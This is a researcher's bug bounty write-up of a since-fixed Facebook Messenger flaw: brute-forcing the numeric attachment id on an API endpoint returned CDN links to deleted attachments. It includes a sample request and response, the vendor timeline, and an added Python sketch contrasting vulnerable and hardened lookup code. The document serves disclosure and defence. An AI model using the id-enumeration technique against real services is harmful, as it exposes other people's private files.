Kassem Bazzoun

Published On: 05 Jul 2020

Accessing Removed Attachment in Facebook Messenger

Privacy/Authentication
Messenger | Other
---
UNDEFINED INFORMATIVE
Description

There is a GraphQL call in the Facebook Messenger application (Android) that is responsible for fetching the CDN URL of attachments sent via the application (audio, video, images). By sending the id of the file, it was possible to retrieve this link for a deleted attachment for up to 24-48 hours after deletion.

Impact

A malicious user is able to access removed attachments sent to his inbox .

Reproduction Steps

Step 1

User A sends a wrong image to User B, then deletes it immediately, before User B has seen it.

Step 2

User B opens Messenger and wants to access this deleted file.

Step 3

User B starts brute forcing the attachment id, which is the parameter aid:

GET /method/messaging.getAttachment?access_token=EAADo1TDZCs.........o4lRwqrfAZD&mid=m-XN2Vy0XGTTNHtI&aid=557707478236527&format=binary HTTP/1.1
X-ZERO-EH: d74d3a21bff49a7491baf87adea0d45d

Step 4

The direct link to the deleted attachment is located in the response's Location header. The user can read the CDN link before it expires, so he has 24-48 hours to perform this action.

HTTP/1.1 302 Found
facebook-api-version: v1.0
Strict-Transport-Security: max-age=15552000; preload
Pragma: no-cache
x-fb-rev: 1001584889
Access-Control-Allow-Origin: *
Cache-Control: private, no-cache, no-store, must-revalidate
Location: https://scontent.xx.fbcdn.net/v/wl/t1.15752-9/fr/cp0/e15/q65/60433625_46908339sdsdsdstestttttttttt6_n.jpg?_nc_cat=109&_nsdsdsdsdsm&_nc_cid=0&_nc_zor=9&_nc_ht=scontent.xx&_nc_tp=12&oh=6244490ac616aab8cf147b52efcf78fe&oe=5EA5A635
x-fb-trace-id: CtO/imxWAOZ
x-fb-request-id: ALaOZmfAQZWFm3Mq6fDyKIe
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Content-Type: text/html; charset="utf-8"
X-FB-Debug: kqTxp00l0Lh8bZ9usadasdsGwrme+TNrBLG6ofknnZLsEh87C3UgnRukYBmwH+w==
Date: Wed, 08 Jan 2020 13:13:56 GMT
Connection: close
Content-Length: 0


Why I sent this as a bug

As we know, the CDN link will go away after some time, but I sent this bug because the user who received the deleted attachment has no way to retrieve the CDN link, yet it is always possible to brute force a numeric attachment id through this endpoint to retrieve that CDN link. Some cases can't be handled on Facebook's side due to how the internet works (e.g. the user has a browser extension that checks the file once it's sent and saves it locally before it's deleted), but in the case I sent it is Facebook's responsibility, and this bug can be mitigated by implementing checks on the "aid" parameter so that if the file is deleted, the server doesn't return the CDN link.

Fixing

I noticed that this bug was fixed by Facebook: once the file is deleted, the server no longer returns the CDN link in the Location header and instead returns an error (400 Bad Request): Error 509: Invalid attachment id (509)
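To make the mitigation concrete, the following is an added Python sketch (not Facebook's code and not from the report) of an attachment resolver in its vulnerable and hardened forms. The request shape (mid, aid, a 302 with a Location header, a 400 with the "Error 509: Invalid attachment id (509)" text) follows the report; the data model, the caller identity, the participant check and the sample records are assumptions introduced here for illustration.

```python
from dataclasses import dataclass
from typing import Dict, Set, Tuple

# Hypothetical data model; the real storage layout is not on the page.
@dataclass
class Attachment:
    aid: int        # numeric attachment id, the "aid" query parameter
    mid: str        # message id the attachment was sent in, the "mid" parameter
    cdn_url: str    # signed CDN URL handed back in the Location header
    deleted: bool = False

@dataclass
class Thread:
    mid: str
    participants: Set[str]

# Constructed sample records: one deleted and one live attachment in the same message.
THREADS: Dict[str, Thread] = {
    "m-XN2Vy0XGTTNHtI": Thread("m-XN2Vy0XGTTNHtI", {"user_a", "user_b"}),
}
ATTACHMENTS: Dict[int, Attachment] = {
    557707478236527: Attachment(557707478236527, "m-XN2Vy0XGTTNHtI",
                                "https://cdn.example.invalid/deleted-placeholder.jpg",
                                deleted=True),
    557707478236528: Attachment(557707478236528, "m-XN2Vy0XGTTNHtI",
                                "https://cdn.example.invalid/live-placeholder.jpg"),
}

# Error body quoted in the report's "Fixing" section.
INVALID_AID = {"error": "Error 509: Invalid attachment id (509)"}

Response = Tuple[int, Dict[str, str]]


def vulnerable_get_attachment(caller: str, mid: str, aid: int) -> Response:
    """Behaviour described in the report: any known aid yields a 302 to the CDN."""
    att = ATTACHMENTS.get(aid)
    if att is None:
        return 400, INVALID_AID
    # Defect: the deleted flag, the mid and the caller are never consulted,
    # so a deleted attachment still redirects to its not-yet-expired CDN URL.
    return 302, {"Location": att.cdn_url}


def hardened_get_attachment(caller: str, mid: str, aid: int) -> Response:
    """Fixed behaviour: deleted, mismatched or unauthorised lookups all get one 400."""
    att = ATTACHMENTS.get(aid)
    thread = THREADS.get(mid)
    denied = (
        att is None                            # unknown aid
        or thread is None                      # unknown mid
        or att.mid != mid                      # aid does not belong to this message
        or caller not in thread.participants   # caller not in the conversation (added check)
        or att.deleted                         # the report's fix: deleted files return no link
    )
    if denied:
        # One indistinguishable error for every failure mode, so the response
        # does not reveal whether a guessed aid exists or has been deleted.
        return 400, INVALID_AID
    return 302, {"Location": att.cdn_url}


if __name__ == "__main__":
    mid = "m-XN2Vy0XGTTNHtI"
    print("vulnerable, deleted aid:", vulnerable_get_attachment("user_b", mid, 557707478236527))
    print("hardened,   deleted aid:", hardened_get_attachment("user_b", mid, 557707478236527))
    print("hardened,   live aid:   ", hardened_get_attachment("user_b", mid, 557707478236528))
```

The hardened resolver deliberately collapses "unknown id", "wrong message", "not a participant" and "deleted" into the same 400 body, because a distinguishable response would still confirm which guessed ids refer to real attachments.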

Timeline

Kassem, 08 Jan 2020: Report sent.

Facebook, 10 Jan 2020: Marked as Informative. "Due to how the internet operates, it is not always possible to retroactively prevent a person from accessing information after it has been delive ..."

Kassem, 10 Jan 2020: Replying with some details. "Replying to Facebook that it's possible to prevent someone from accessing that file by making the proper checks on the parameter "aid", so if this ..."

Facebook, 11 Jan 2020: Facebook replied with the same response. "Yeah, this is because it's cached on a CDN. These will eventually go away, but as I mentioned earlier, it is not always possible to retroactively pr ..."
